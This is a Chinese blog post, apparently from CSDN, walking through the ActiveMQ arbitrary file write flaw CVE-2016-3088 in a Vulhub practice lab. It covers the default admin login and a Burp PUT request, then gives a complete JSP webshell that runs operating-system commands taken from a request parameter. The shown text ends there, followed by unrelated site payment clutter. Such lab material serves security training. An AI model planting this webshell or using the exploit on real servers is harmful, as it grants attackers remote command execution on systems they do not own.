vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞

本文介绍了如何利用CVE-2016-3088漏洞在ActiveMQ靶场中进行渗透测试。实验包括登录ActiveMQ靶站,使用PUT和MOVE方法写入并执行webshell,详细解释了漏洞原理和源码分析,并列举了其他可能的利用方式。
摘要由CSDN通过智能技术生成

Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。
本篇的内容是完成ActiveMQ任意文件写入漏洞(CVE-2016-3088)

ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

本篇我就先进行一次完整的实验过程,然后再按照自己的理解来详细讲解。

实验步骤

1.进入ActiveMQ靶站
在这里插入图片描述
实验需要进行登录,点击“Manage ActiveMQ broker”,登录,账号密码都是admin,进入之后效果如下:
在这里插入图片描述

2.然后进入首页下的fileserver这个文件夹里
在这里插入图片描述
bp抓包(刷新一下页面就行),然后send to repeater,改成put方法,写入shell,代码如下:

<%
  	if("023".equals(request.getParameter("pwd"))){
   
  		java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  		int a = -1;
  		byte[] b = new byte[2048];
  		out.print("<pre>");
  		while((a=in.read(b))!=-1){
   
  			out.println(new String(b));
  		}
  		out.print("</pre>");
  	}
%>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值